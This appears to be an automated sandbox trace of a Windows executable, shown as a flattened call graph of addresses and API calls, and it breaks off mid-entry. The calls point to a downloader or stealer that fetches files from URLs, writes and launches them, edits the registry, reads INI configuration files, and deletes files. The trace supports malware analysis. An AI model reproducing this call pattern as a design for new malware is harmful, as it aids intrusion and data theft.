5806->5808 5807->5808 5808->5804 5809 40a786 35 API calls 5808->5809 5809->5808 6121 40d530 5810->6121 5812 407805 CreateProcessW 5812->5757 5814 40ac60 RegOpenKeyExW 5813->5814 5815 40ac4a 5813->5815 5816 40ac78 5814->5816 5817 40ac7c 5814->5817 6123 4069c0 RegQueryValueExW RegCloseKey 5815->6123 5816->5728 5816->5757 6124 4069c0 RegQueryValueExW RegCloseKey 5817->6124 5820 40ac5a 5820->5814 5820->5816 5822 406a2c 5821->5822 5823 406a30 5821->5823 5822->5734 5822->5735 5824 406a39 RegSetValueExW RegCloseKey 5823->5824 5824->5822 5827 40a79c 5825->5827 5829 40a7b3 5825->5829 5826 406d14 2 API calls 5826->5827 5827->5826 5828 40a79e Sleep 5827->5828 5827->5829 5828->5827 5830 406cb5 GetVersionExW 5829->5830 5831 40a83f 5830->5831 5832 4078cb 12 API calls 5831->5832 5833 40a873 5832->5833 5834 40a718 5 API calls 5833->5834 5836 40a87b 5834->5836 5835 40a744 5 API calls 5835->5836 5836->5835 5837 40a894 Sleep 5836->5837 5838 406e69 22 API calls 5836->5838 5839 40a8c7 Sleep 5836->5839 5840 40a8e1 GetProcessHeap HeapFree 5836->5840 5837->5836 5838->5836 5839->5836 5840->5742 5906 40584d 5841->5906 5843 407557 Sleep 5843->5770 5846 4073dd SystemTimeToFileTime SystemTimeToFileTime 5844->5846 5847 407432 5846->5847 5848 40745f SetWaitableTimer WaitForSingleObject CloseHandle 5847->5848 5848->5770 5907 406d14 InternetAttemptConnect 5849->5907 5851 40aca4 5852 40aca9 Sleep 5851->5852 5853 40acbd 5851->5853 5854 406d14 2 API calls 5852->5854 5910 4078cb 5853->5910 5854->5851 5856 40acd4 5917 406cb5 GetVersionExW 5856->5917 5858 40ad09 5919 40a718 5858->5919 5861 40ad71 Sleep 5863 40ad4c 5861->5863 5863->5861 5864 40ad9f Sleep 5863->5864 5865 40adbc 5863->5865 5923 40a744 5863->5923 5927 406e69 5863->5927 5864->5863 5865->5770 5867 40b0a3 5866->5867 5868 40b0bd 5867->5868 5869 40b0cf 5867->5869 5896 40b0ae 5867->5896 6031 407995 5868->6031 6038 407951 5869->6038 5872 40b0cd 5876 40b0fb GetModuleFileNameW 5872->5876 5888 40b155 5872->5888 5873 40b177 InternetClearAllPerSiteCookieDecisions 5875 40b17d 5873->5875 5874 40b168 InternetSetPerSiteCookieDecisionW 5874->5875 6059 4032b8 5875->6059 5878 40b116 GetCurrentDirectoryW 5876->5878 5884 40b10d 5876->5884 5878->5884 5880 40b186 GetLastError 5882 40a786 35 API calls 5880->5882 5881 40b196 5883 40b1b0 CreateThread 5881->5883 5885 40b1e1 5881->5885 5882->5881 5883->5881 6043 40253c 5884->6043 5887 40b221 5885->5887 5889 40a786 35 API calls 5885->5889 5890 40b228 CloseHandle 5887->5890 5891 40b23d 5887->5891 5888->5873 5888->5874 5888->5896 5892 40b1f7 5889->5892 5890->5890 5890->5891 5893 40a6c9 InternetCloseHandle 5891->5893 5892->5887 5894 40b212 WaitForMultipleObjects 5892->5894 5895 40b242 InternetClearAllPerSiteCookieDecisions 5893->5895 5894->5887 5895->5896 5897 40b24d 5895->5897 5896->5770 5897->5896 5898 40b261 GetModuleFileNameW 5897->5898 5899 40b27c GetCurrentDirectoryW 5898->5899 5900 40b273 5898->5900 5899->5900 5901 40253c 50 API calls 5900->5901 5901->5896 5905 40a6cf 5902->5905 5903 40a6fc InternetCloseHandle 5903->5905 5904 40a716 ExitProcess 5905->5903 5905->5904 5906->5843 5908 406d22 5907->5908 5909 406d26 InternetOpenW 5907->5909 5908->5851 5909->5851 5939 407e2b 5910->5939 5912 4078dd 5913 407900 5912->5913 5945 40782a GetModuleFileNameW CreateFileW 5912->5945 5913->5856 5915 4078ec 5915->5913 5949 407d61 5915->5949 5918 406cf6 5917->5918 5918->5858 5920 40a722 5919->5920 5921 40a739 5920->5921 5961 4079ff 5920->5961 5921->5863 5924 40a75d 5923->5924 5925 4079ff 5 API calls 5924->5925 5926 40a76e 5924->5926 5925->5926 5926->5863 5928 40d5b0 5927->5928 5929 406e76 GetTickCount 5928->5929 5930 406e92 5929->5930 5967 407b4e 5930->5967 5932 406f49 5976 409c99 5932->5976 5936 407017 5936->5863 5937 406ff4 5937->5936 5992 407a3c 5937->5992 5940 407e3d 5939->5940 5941 407e4e SetFilePointer ReadFile 5939->5941 5955 407cd7 5940->5955 5944 407e7e 5941->5944 5943 407e44 5943->5941 5943->5944 5944->5912 5946 407871 GetFileTime CloseHandle 5945->5946 5947 407888 GetTickCount 5945->5947 5948 407893 5946->5948 5947->5948 5948->5915 5950 407d70 5949->5950 5953 407d77 5949->5953 5951 407cd7 3 API calls 5950->5951 5951->5953 5952 407d81 5952->5913 5953->5952 5954 407dfa SetFilePointer WriteFile 5953->5954 5954->5913 5956 40d5b0 5955->5956 5957 407ce4 GetModuleFileNameW 5956->5957 5958 407d00 5957->5958 5959 407d0d GetCurrentDirectoryW 5957->5959 5960 407d36 CreateFileW 5958->5960 5959->5958 5960->5943 5964 407908 5961->5964 5963 407a05 5963->5920 5965 407e2b 5 API calls 5964->5965 5966 407919 5965->5966 5966->5963 6002 407267 5967->6002 5969 407b63 5970 407e2b 5 API calls 5969->5970 5971 407b83 5969->5971 5970->5971 5971->5971 5972 407c6b 5971->5972 6007 40bcb4 5971->6007 6017 40bd55 5972->6017 5977 409ca6 5976->5977 5978 409cbb InternetOpenUrlW 5977->5978 5979 409cdf GetProcessHeap HeapAlloc 5978->5979 5980 406fe2 5978->5980 5979->5980 5981 409d5b InternetReadFile 5979->5981 5980->5936 5988 406e00 5980->5988 5982 409d79 GetProcessHeap HeapAlloc 5981->5982 5984 409d0b 5981->5984 5983 409d92 GetProcessHeap HeapFree 5982->5983 5983->5980 5984->5981 5984->5982 5986 409d1f GetProcessHeap HeapReAlloc 5984->5986 5987 40c5d0 __VEC_memcpy 5984->5987 5986->5980 5986->5984 5987->5984 5989 406e12 5988->5989 5990 40c5d0 __VEC_memcpy 5989->5990 5991 406e21 5990->5991 5991->5937 5993 407a4f 5992->5993 5994 40c5d0 __VEC_memcpy 5993->5994 6001 407b42 5993->6001 5995 407a7d 5994->5995 5996 407267 3 API calls 5995->5996 5995->6001 5997 407b17 5996->5997 5998 407267 3 API calls 5997->5998 5999 407b20 5998->5999 6000 407d61 5 API calls 5999->6000 6000->6001 6001->5936 6003 407284 6002->6003 6004 407278 GetSystemTime 6002->6004 6005 40728b SystemTimeToFileTime SystemTimeToFileTime 6003->6005 6004->6005 6006 4072e8 __aulldiv 6005->6006 6006->5969 6011 40bcd3 6007->6011 6008 40bd17 6009 40bd3a 6008->6009 6012 40b51c __VEC_memcpy 6008->6012 6010 40bd4d 6009->6010 6013 40c5d0 __VEC_memcpy 6009->6013 6010->5972 6011->6008 6023 40c5d0 6011->6023 6012->6008 6013->6010 6018 40bd5c 6017->6018 6018->6018 6019 40bd9e 6018->6019 6020 40bcb4 __VEC_memcpy 6018->6020 6021 40bcb4 __VEC_memcpy 6019->6021 6020->6019 6022 407c7c 6021->6022 6022->5932 6024 40c5e8 6023->6024 6025 40c60f __VEC_memcpy 6024->6025 6026 40bcf9 6024->6026 6025->6026 6026->6010 6027 40b51c 6026->6027 6028 40b543 6027->6028 6030 40b552 6027->6030 6029 40c5d0 __VEC_memcpy 6028->6029 6029->6030 6030->6008 6037 4079a2 6031->6037 6032 4079f1 6033 407951 36 API calls 6032->6033 6035 4079fc 6033->6035 6034 407e2b 5 API calls 6034->6037 6035->5872 6037->6032 6037->6034 6066 40791c 6037->6066 6040 407965 6038->6040 6039 407e2b 5 API calls 6039->6040 6040->6039 6041 40798e 6040->6041 6042 40791c 36 API calls 6040->6042 6041->5872 6042->6040 6045 402549 6043->6045 6044 402572 6046 402584 DeleteFileW 6044->6046 6048 40a786 35 API calls 6044->6048 6045->6044 6047 406d14 2 API calls 6045->6047 6052 402561 Sleep 6045->6052 6049 402594 6046->6049 6053 4025ba 6046->6053 6047->6045 6050 402581 6048->6050 6054 4025c1 6049->6054 6055 4025ad Sleep 6049->6055 6072 407036 DeleteFileW CreateFileW 6049->6072 6050->6046 6052->6045 6053->5888 6056 40a786 35 API calls 6054->6056 6058 4025d0 _memset 6054->6058 6055->6049 6055->6053 6056->6058 6057 402630 CreateProcessW 6057->6053 6058->6057 6083 406a68 RegOpenKeyExW 6059->6083 6064 403351 GetProcAddress GetProcAddress GetProcAddress 6065 403386 6064->6065 6065->5880 6065->5881 6067 407d61 5 API calls 6066->6067 6068 407930 6067->6068 6069 407939 GetLastError 6068->6069 6070 407949 6068->6070 6071 40a786 35 API calls 6069->6071 6070->6037 6071->6070 6073 407078 GetLastError 6072->6073 6078 40706b 6072->6078 6074 407095 InternetOpenUrlW 6073->6074 6075 407089 SetEndOfFile 6073->6075 6076 4070c6 InternetQueryDataAvailable 6074->6076 6077 4070b8 CloseHandle 6074->6077 6075->6074 6079 407119 InternetReadFile 6076->6079 6077->6078 6078->6049 6080 407123 CloseHandle InternetCloseHandle 6079->6080 6081 4070ed 6079->6081 6080->6078 6081->6080 6082 4070f2 WriteFile 6081->6082 6082->6079 6084 406a9a 6083->6084 6088 4032c4 6083->6088 6107 4069c0 RegQueryValueExW RegCloseKey 6084->6107 6086 406aaa 6087 4069fd 3 API calls 6086->6087 6086->6088 6087->6088 6089 406adf 6088->6089 6090 406aec 6089->6090 6091 406b11 RegOpenKeyExW 6090->6091 6092 406b34 6091->6092 6100 4032ce 6 API calls 6091->6100 6108 4069c0 RegQueryValueExW RegCloseKey 6092->6108 6094 406b49 6095 406b78 RegOpenKeyExW 6094->6095 6094->6100 6096 406b96 6095->6096 6097 406ba6 6095->6097 6109 4069c0 RegQueryValueExW RegCloseKey 6096->6109 6099 4069fd 3 API calls 6097->6099 6101 406bc3 6097->6101 6099->6101 6100->6064 6100->6065 6101->6100 6102 406c03 RegOpenKeyExW 6101->6102 6103 406c21 6102->6103 6106 406c31 6102->6106 6110 4069c0 RegQueryValueExW RegCloseKey 6103->6110 6105 4069fd 3 API calls 6105->6100 6106->6100 6106->6105 6107->6086 6108->6094 6109->6097 6110->6106 6112 40760a CreateFileW 6111->6112 6113 407622 6111->6113 6112->6113 6114 40762a GetFileSize GetProcessHeap RtlAllocateHeap 6112->6114 6113->5804 6114->6113 6115 407650 ReadFile 6114->6115 6115->6113 6116 40766a 6115->6116 6116->6113 6117 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 6116->6117 6120 40584d 6117->6120 6119 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 6119->6113 6120->6119 6122 40d53c __VEC_memzero 6121->6122 6122->5812 6123->5820 6124->5816 6846 401006 6847 40101f 6846->6847 6848 407499 5 API calls 6847->6848 6851 4010c1 6847->6851 6849 4010ce 6848->6849 6850 407552 Sleep 6849->6850 6849->6851 6850->6851 6852 409a07 6855 409a14 6852->6855 6853 409a92 6854 409a6d SysAllocString 6854->6853 6855->6853 6855->6854 6856 403287 6857 403292 6856->6857 6858 4032aa 6856->6858 6857->6858 6860 408604 RegOpenKeyExW 6857->6860 6861 408632 6860->6861 6862 40864a GetLastError 6860->6862 6870 4069c0 RegQueryValueExW RegCloseKey 6861->6870 6864 408654 6862->6864 6865 408658 6862->6865 6864->6857 6867 408682 DeleteFileW 6865->6867 6868 40866a 6865->6868 6866 408646 6866->6862 6867->6864 6869 4069fd 3 API calls 6868->6869 6869->6864 6870->6866 6880 40ce08 6881 40ce1a 6880->6881 6883 40ce28 @_EH4_CallFilterFunc@8 6880->6883 6882 40cd66 __except_handler4 5 API calls 6881->6882 6882->6883 6884 409909 6885 409916 6884->6885 6892 409723 6885->6892 6887 409a02 6888 409934 6888->6887 6889 409723 __VEC_memcpy 6888->6889 6890 4099d5 6889->6890 6890->6887 6891 4099de SysAllocString SysAllocString 6890->6891 6891->6887 6893 409733 6892->6893 6894 40c5d0 __VEC_memcpy 6893->6894 6895 409772 6893->6895 6894->6895 6895->6888 6210 4047cc 6211 40821c PathCombineW 6210->6211 6212 4047f1 6211->6212 6213 404800 6212->6213 6214 404843 6212->6214 6218 40483b 6212->6218 6217 408248 8 API calls 6213->6217 6234 4083c4 CreateFileW 6214->6234 6217->6218 6221 404a61 6223 404a79 6221->6223 6224 404a69 VirtualFree 6221->6224 6222 40487b HeapAlloc 6231 404896 6222->6231 6223->6218 6225 404a7f CloseHandle 6223->6225 6224->6223 6225->6218 6226 404a4a 6227 40be3a HeapFree 6226->6227 6228 404a53 6227->6228 6255 40be54 6228->6255 6230 40490c StrStrIA StrStrIA StrStrIA StrStrIA 6230->6231 6231->6226 6231->6230 6233 40c00b 3 API calls 6231->6233 6250 40c3f9 6231->6250 6233->6231 6235 4083ea GetFileSizeEx 6234->6235 6236 404854 6234->6236 6237 4083f9 6235->6237 6238 40844f CloseHandle 6235->6238 6236->6218 6243 40c290 6236->6243 6237->6236 6237->6238 6239 40840e VirtualAlloc 6237->6239 6238->6236 6239->6238 6240 408423 ReadFile 6239->6240 6241 408441 VirtualFree 6240->6241 6242 408439 6240->6242 6241->6238 6242->6236 6242->6241 6244 40486e 6243->6244 6249 40c2b6 6243->6249 6244->6221 6244->6222 6245 40bde1 3 API calls 6245->6249 6246 40c340 6247 40be54 HeapFree 6246->6247 6247->6244 6249->6244 6249->6245 6249->6246 6261 40c05c 6249->6261 6251 40c402 6250->6251 6252 40c407 6250->6252 6251->6231 6253 40c412 wvnsprintfW 6252->6253 6254 40c42e 6253->6254 6254->6231 6257 40be5b 6255->6257 6260 40be73 6255->6260 6256 40be3a HeapFree 6256->6257 6257->6256 6258 40be6d 6257->6258 6257->6260 6259 40be3a HeapFree 6258->6259 6259->6260 6260->6221 6262 40c066 6261->6262 6263 40c06a 6261->6263 6262->6249 6263->6262 6266 40be27 HeapAlloc 6263->6266 6265 40c086 6265->6249 6266->6265 6896 40978d 6897 40979a 6896->6897 6898 409655 __VEC_memcpy 6897->6898 6899 4097b3 6898->6899 6900 4097ba 6899->6900 6901 409655 __VEC_memcpy 6899->6901 6902 4097d6 6901->6902 6903 409805 6902->6903 6904 4097df SysAllocString SysAllocString 6902->6904 6904->6903 6905 402d0e 6906 40267a 122 API calls 6905->6906 6907 402d32 6906->6907 6910 409c6f 6907->6910 6911 402d3a 6910->6911 6912 409c7a SysFreeString 6910->6912 6912->6911 6912->6912 6913 40350f 6914 40821c PathCombineW 6913->6914 6915 403531 6914->6915 6916 40354d 6915->6916 6917 403540 6915->6917 6918 403553 HeapAlloc 6915->6918 6919 4034a8 8 API calls 6917->6919 6918->6916 6920 403576 GetPrivateProfileStringW 6918->6920 6919->6916 6921 403594 6920->6921 6922 40372c 6920->6922 6921->6922 6924 4035a8 HeapAlloc 6921->6924 6923 40be3a HeapFree 6922->6923 6923->6916 6924->6922 6931 4035c5 6924->6931 6925 403627 GetPrivateProfileStringW 6926 403643 GetPrivateProfileIntW 6925->6926 6925->6931 6927 403669 GetPrivateProfileStringW 6926->6927 6926->6931 6928 40368b GetPrivateProfileStringW 6927->6928 6927->6931 6928->6931 6929 403723 6930 40be3a HeapFree 6929->6930 6930->6922 6931->6925 6931->6929 6932 40c3f9 wvnsprintfW 6931->6932 6933 40c00b 3 API calls 6931->6933 6932->6931 6933->6931 6267 40cbd0 6268 40cc08 6267->6268 6269 40cbfb 6267->6269 6271 40cd66 __except_handler4 5 API calls 6268->6271 6285 40cd66 6269->6285 6274 40cc18 __except_handler4 6271->6274 6272 40cc9f 6273 40cc74 __except_handler4 6273->6272 6275 40cc8f 6273->6275 6276 40cd66 __except_handler4 5 API calls 6273->6276 6274->6272 6274->6273 6279 40ccb5 __except_handler4 6274->6279 6277 40cd66 __except_handler4 5 API calls 6275->6277 6276->6275 6277->6272 6293 40ce9a RtlUnwind 6279->6293 6280 40ccf4 __except_handler4 6281 40cd2b 6280->6281 6282 40cd66 __except_handler4 5 API calls 6280->6282 6283 40cd66 __except_handler4 5 API calls 6281->6283 6282->6281 6284 40cd3b __except_handler4 6283->6284 6286 40cd70 IsDebuggerPresent 6285->6286 6287 40cd6e 6285->6287 6295 40d247 6286->6295 6287->6268 6290 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 6291 40d0f3 __except_handler4 6290->6291 6292 40d0fb GetCurrentProcess TerminateProcess 6290->6292 6291->6292 6292->6268 6294 40ceaf 6293->6294 6294->6280 6295->6290 6940 40d990 6941 40d993 VirtualQuery 6940->6941 6943 40d9b2 6941->6943 6945 40d7d1 _ValidateScopeTableHandlers __except_handler4 __FindPESection 6941->6945 6944 40d9cc GetVersionExA 6943->6944 6943->6945 6944->6945 6296 401652 6297 401665 6296->6297 6301 4016f6 6297->6301 6302 407499 GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 6297->6302 6299 4016da 6300 407552 Sleep 6299->6300 6299->6301 6300->6301 6303 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6302->6303 6303->6299 6946 402214 6949 402233 6946->6949 6947 402319 6948 402386 6947->6948 6954 401c41 6947->6954 6949->6947 6951 408091 3 API calls 6949->6951 6951->6947 6952 402478 6952->6948 6953 408091 3 API calls 6952->6953 6953->6948 6959 401c4e 6954->6959 6955 401e07 6958 407267 3 API calls 6955->6958 6960 401d15 6955->6960 6956 401d0e 6957 407267 3 API calls 6956->6957 6957->6960 6958->6960 6959->6955 6959->6956 6960->6952 6304 402dd5 6307 40267a 6304->6307 6313 40268a 6307->6313 6308 4027dd 6309 4026ee GetTickCount 6309->6313 6312 407552 Sleep 6312->6313 6313->6308 6313->6309 6313->6312 6314 4027e6 OleInitialize 6313->6314 6375 40a8f9 6313->6375 6392 40a469 6314->6392 6316 402806 6322 40280b 6316->6322 6399 40a345 6316->6399 6319 402851 6405 40a65e 6319->6405 6320 40285f 6323 40286e 6320->6323 6408 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 6320->6408 6322->6313 6410 409f2b 6323->6410 6326 402884 6327 4028b4 6326->6327 6332 402943 6326->6332 6418 408f26 6326->6418 6330 408f26 10 API calls 6327->6330 6327->6332 6329 402c20 6331 40a65e Sleep 6329->6331 6333 4028ea 6330->6333 6331->6322 6332->6329 6337 4029aa 6332->6337 6443 4089fd 6332->6443 6334 4028f1 6333->6334 6335 402956 6333->6335 6342 402904 SysAllocString 6334->6342 6338 40a65e Sleep 6335->6338 6340 4029e6 6337->6340 6343 4089fd 5 API calls 6337->6343 6338->6332 6339 402a3b 6346 408f26 10 API calls 6339->6346 6348 402a6f 6339->6348 6340->6339 6452 40920a 6340->6452 6345 402927 SysFreeString 6342->6345 6350 40293a 6342->6350 6343->6340 6344 402a17 6457 409c49 6344->6457 6345->6345 6345->6350 6351 402a62 SysAllocString 6346->6351 6347 402aa2 6353 402ad1 6347->6353 6358 408f26 10 API calls 6347->6358 6348->6347 6352 408f26 10 API calls 6348->6352 6350->6332 6437 4091bd 6350->6437 6351->6348 6357 402a95 SysAllocString 6352->6357 6354 402b04 6353->6354 6359 408f26 10 API calls 6353->6359 6360 40a65e Sleep 6354->6360 6357->6347 6361 402ac4 SysAllocString 6358->6361 6362 402af7 SysAllocString 6359->6362 6363 402b0e 6360->6363 6361->6353 6362->6354 6364 409c49 SysAllocString 6363->6364 6365 402b6b 6363->6365 6364->6365 6366 402b83 6365->6366 6367 409c49 SysAllocString 6365->6367 6368 402be3 6366->6368 6369 402bea 6366->6369 6367->6366 6460 408825 6368->6460 6484 408692 6369->6484 6372 402be8 SysFreeString 6372->6329 6374 402c11 SysFreeString 6372->6374 6374->6329 6374->6374 6376 40a906 6375->6376 6377 406d14 2 API calls 6376->6377 6378 40a917 Sleep 6376->6378 6379 40a92c 6376->6379 6377->6376 6378->6376 6380 4078cb 12 API calls 6379->6380 6381 40aa37 6380->6381 6382 406cb5 GetVersionExW 6381->6382 6383 40aa52 6382->6383 6384 40a718 5 API calls 6383->6384 6385 40aa7e 6384->6385 6386 40a744 5 API calls 6385->6386 6388 40aa91 6386->6388 6387 406e69 22 API calls 6387->6388 6388->6387 6389 40aabc Sleep 6388->6389 6390 40aae5 GetProcessHeap HeapFree 6388->6390 6391 40a744 5 API calls 6388->6391 6389->6388 6390->6313 6391->6388 6393 40a479 6392->6393 6395 40a4ef 6393->6395 6396 40a4dc 6393->6396 6500 40a156 6393->6500 6395->6316 6396->6395 6397 40a530 InternetOpenW 6396->6397 6397->6395 6398 40a545 InternetSetOptionW 6397->6398 6398->6395 6400 40a352 6399->6400 6402 40284a 6400->6402 6403 40a442 6400->6403 6517 40a245 6400->6517 6402->6319 6402->6320 6403->6402 6525 40a2d9 6403->6525 6407 40a662 Sleep 6405->6407 6407->6322 6409 40735e __aulldiv 6408->6409 6409->6323 6411 409f37 6410->6411 6412 409f40 GetTickCount 6411->6412 6413 409f5f GetTickCount 6412->6413 6414 409f67 PeekMessageW 6413->6414 6417 409fa7 6413->6417 6415 409f88 Sleep 6414->6415 6416 409f7c DispatchMessageW 6414->6416 6415->6413 6416->6414 6417->6326 6541 40a582 6418->6541 6420 408f35 6421 408f78 SysFreeString 6420->6421 6428 408f96 6420->6428 6429 408f3e 6420->6429 6421->6421 6421->6428 6422 409039 6423 409040 6422->6423 6424 409043 SysFreeString 6422->6424 6425 409058 6422->6425 6423->6424 6424->6429 6426 409091 GetTickCount 6425->6426 6427 40905f 6425->6427 6436 4090ae 6426->6436 6430 40908f 6427->6430 6431 40906a SysAllocString 6427->6431 6428->6422 6432 409025 SysFreeString 6428->6432 6429->6327 6433 409108 SysFreeString 6430->6433 6434 40911b SysFreeString 6430->6434 6431->6427 6432->6428 6433->6433 6433->6434 6434->6429 6435 4090c7 SysAllocString 6435->6436 6436->6430 6436->6435 6438 40a582 2 API calls 6437->6438 6439 4091cc 6438->6439 6440 4091d2 6439->6440 6549 409655 6439->6549 6440->6332 6444 408a1a 6443->6444 6445 408bc4 6444->6445 6447 408c0d VariantClear 6444->6447 6448 408a1e 6444->6448 6449 408b99 SysFreeString 6444->6449 6450 408bab VariantClear 6444->6450 6451 408b6b SysFreeString 6444->6451 6446 408c1c GetTickCount 6445->6446 6445->6448 6446->6448 6447->6448 6448->6337 6449->6444 6450->6444 6450->6445 6451->6444 6456 409217 6452->6456 6453 409295 SysAllocString 6453->6344 6456->6453 6553 408091 6456->6553 6458 409c54 SysAllocString 6457->6458 6459 402a27 SysAllocString SysFreeString 6457->6459 6458->6459 6459->6339 6461 408832 6460->6461 6462 40a469 14 API calls 6461->6462 6464 408857 6462->6464 6463 40885c 6463->6372 6464->6463 6465 40a345 22 API calls 6464->6465 6473 408883 6465->6473 6466 40888a 6468 40a65e Sleep 6466->6468 6467 4088eb 6469 409f2b 5 API calls 6467->6469 6468->6463 6470 4088f6 6469->6470 6471 4089fd 5 API calls 6470->6471 6472 408911 6471->6472 6472->6466 6481 40891f 6472->6481 6473->6466 6473->6467 6561 409301 6473->6561 6475 4089f0 SysFreeString 6477 40a65e Sleep 6477->6481 6478 40a469 14 API calls 6478->6481 6479 40a345 22 API calls 6479->6481 6480 409f2b 5 API calls 6480->6481 6481->6475 6481->6477 6481->6478 6481->6479 6481->6480 6482 409301 7 API calls 6481->6482 6483 4089cd SysFreeString SysFreeString 6482->6483 6483->6481 6485 40a469 14 API calls 6484->6485 6487 4086b1 6485->6487 6486 4086b6 6486->6372 6487->6486 6488 40a345 22 API calls 6487->6488 6489 4086de 6488->6489 6490 4086e5 6489->6490 6491 4086f8 6489->6491 6492 40a65e Sleep 6490->6492 6493 409f2b 5 API calls 6491->6493 6492->6486 6495 408703 6493->6495 6494 40874a CharLowerW SysFreeString 6499 40876c 6494->6499 6495->6494 6496 408811 6498 409f2b 5 API calls 6498->6499 6499->6496 6499->6498 6572 408cb7 6499->6572 6501 40a16a 6500->6501 6504 40a16f 6500->6504 6512 40a0b5 CoInitialize 6501->6512 6506 40a188 SysAllocString 6504->6506 6515 40a057 GetForegroundWindow CoCreateInstance SetForegroundWindow 6504->6515 6508 40a1b8 6506->6508 6507 40a224 6507->6396 6508->6507 6509 40a1ce FindWindowW 6508->6509 6510 40a1e8 GetWindowLongW SetWindowLongW SetWindowPos 6509->6510 6511 40a1de SetParent 6509->6511 6510->6507 6511->6510 6513 40a0cc GetModuleHandleW CreateWindowExW 6512->6513 6514 40a0fd 6513->6514 6514->6504 6516 40a093 6515->6516 6516->6506 6516->6507 6518 40a262 _memset 6517->6518 6519 40a2d6 6517->6519 6520 40a270 SysAllocString SysAllocString 6518->6520 6519->6403 6521 40a2b3 6520->6521 6522 40a2c3 SysFreeString SysFreeString 6521->6522 6531 409fb1 6521->6531 6522->6519 6524 40a2c2 6524->6522 6526 40a2f4 6525->6526 6530 40a2f0 6525->6530 6527 40a313 6526->6527 6528 40a2fe GetProcessHeap HeapFree 6526->6528 6529 409c99 11 API calls 6527->6529 6528->6527 6529->6530 6530->6402 6540 40d258 6531->6540 6533 409fbd GetTickCount 6538 409fd3 6533->6538 6534 409fde GetTickCount 6535 409fea Sleep 6534->6535 6537 40a030 6534->6537 6536 409ff2 PeekMessageW 6535->6536 6536->6538 6539 40a005 DispatchMessageW 6536->6539 6537->6524 6538->6534 6538->6537 6539->6536 6540->6533 6542 40a5a0 6541->6542 6543 40a5a4 6541->6543 6542->6420 6544 40a63f 6543->6544 6547 40a5ae 6543->6547 6545 40a64e SysAllocString 6544->6545 6546 40a63b 6544->6546 6545->6546 6546->6420 6547->6546 6548 40a632 SysFreeString 6547->6548 6548->6546 6551 40966d 6549->6551 6550 4091eb SysFreeString 6550->6440 6551->6550 6552 40c5d0 __VEC_memcpy 6551->6552 6552->6550 6555 40809e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6553->6555 6554 408212 6554->6456 6555->6554 6557 407f4f 6555->6557 6558 407f5c 6557->6558 6559 407f71 6558->6559 6560 4072ed 3 API calls 6558->6560 6559->6555 6560->6559 6562 409314 6561->6562 6563 40933b CharLowerW 6562->6563 6567 409364 6562->6567 6571 4088de SysFreeString SysFreeString 6562->6571 6564 409351 6563->6564 6565 409362 SysFreeString 6564->6565 6566 409359 SysFreeString 6564->6566 6565->6567 6566->6571 6568 4093ae SysAllocString SysAllocString 6567->6568 6567->6571 6570 4093d7 SysFreeString SysFreeString 6568->6570 6570->6571 6571->6467 6573 408cd2 6572->6573 6574 408f17 VariantClear 6573->6574 6575 408e8f 6573->6575 6576 408cd6 6573->6576 6578 408e6d SysFreeString 6573->6578 6579 408e76 VariantClear 6573->6579 6580 408e2c SysFreeString 6573->6580 6582 409581 6573->6582 6574->6576 6575->6576 6577 408ed5 SysAllocString 6575->6577 6576->6499 6577->6576 6578->6579 6579->6573 6579->6575 6580->6573 6583 409591 6582->6583 6584 409595 6583->6584 6585 409599 CharLowerW 6583->6585 6584->6573 6586 4095fb 6585->6586 6588 4095b3 6585->6588 6587 40960a SysFreeString 6586->6587 6587->6573 6588->6586 6588->6587 6589 4095d5 CharLowerW 6588->6589 6590 4095df 6589->6590 6591 409605 SysFreeString 6590->6591 6591->6587 6961 403e18 6962 40821c PathCombineW 6961->6962 6963 403e3d 6962->6963 6964 403e87 6963->6964 6965 403e4c 6963->6965 6966 403e8f 6963->6966 6968 408248 8 API calls 6965->6968 6967 40c519 4 API calls 6966->6967 6970 403e9c 6967->6970 6968->6964 6969 40c5b9 SysFreeString 6969->6970 6970->6964 6970->6969 6971 40c43d 4 API calls 6970->6971 6972 40c00b 3 API calls 6970->6972 6973 40be3a HeapFree 6970->6973 6971->6970 6972->6970 6973->6970 6974 409a99 6975 409aa6 6974->6975 6976 409723 __VEC_memcpy 6975->6976 6977 409ac4 6976->6977 6978 409b18 6977->6978 6979 409723 __VEC_memcpy 6977->6979 6980 409ae9 6979->6980 6980->6978 6981 409af2 SysAllocString SysAllocString 6980->6981 6981->6978 6982 409f99 Sleep 6983 409fa7 6982->6983 6592 402c62 6601 406c77 RegOpenKeyExW 6592->6601 6594 402c77 6595 406cb5 GetVersionExW 6594->6595 6596 402c7c 6595->6596 6597 40a8f9 34 API calls 6596->6597 6598 402c8f 6597->6598 6599 40267a 122 API calls 6598->6599 6600 402ca8 6599->6600 6602 406c9b 6601->6602 6603 406c9f 6601->6603 6602->6594 6606 4069c0 RegQueryValueExW RegCloseKey 6603->6606 6605 406cb0 6605->6594 6606->6605 6984 40d2a4 6985 40d2ac 6984->6985 6986 40d378 __except_handler3 6985->6986 6990 40d790 6985->6990 6989 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6989->6986 6996 40d110 RtlUnwind 6989->6996 6994 40d7e5 _ValidateScopeTableHandlers __except_handler4 __FindPESection 6990->6994 6995 40d7d1 _ValidateScopeTableHandlers __except_handler4 __FindPESection 6990->6995 6991 40d99d VirtualQuery 6992 40d9b2 6991->6992 6991->6995 6993 40d9cc GetVersionExA 6992->6993 6992->6995 6993->6995 6994->6991 6994->6995 6995->6989 6997 40d128 6996->6997 6997->6989 6607 4053ea HeapCreate 6608 405408 GetProcessHeap 6607->6608 6609 40541c 6607->6609 6608->6609 6626 403740 6609->6626 6627 40375a 6626->6627 6743 40848f RegOpenKeyExW 6627->6743 6630 4037a2 ExpandEnvironmentStringsW 6753 4034a8 6630->6753 6631 403846 6635 40be3a HeapFree 6631->6635 6632 40383c 6757 4033a0 6632->6757 6636 403844 6635->6636 6641 403c10 6636->6641 6637 4037f6 SHGetFolderPathW 6638 4037c3 6637->6638 6638->6637 6639 403837 6638->6639 6640 408248 8 API calls 6638->6640 6639->6631 6639->6632 6640->6638 6642 403c29 6641->6642 6643 40848f 7 API calls 6642->6643 6644 403c6d 6643->6644 6645 403c79 ExpandEnvironmentStringsW 6644->6645 6654 403ca9 6644->6654 6771 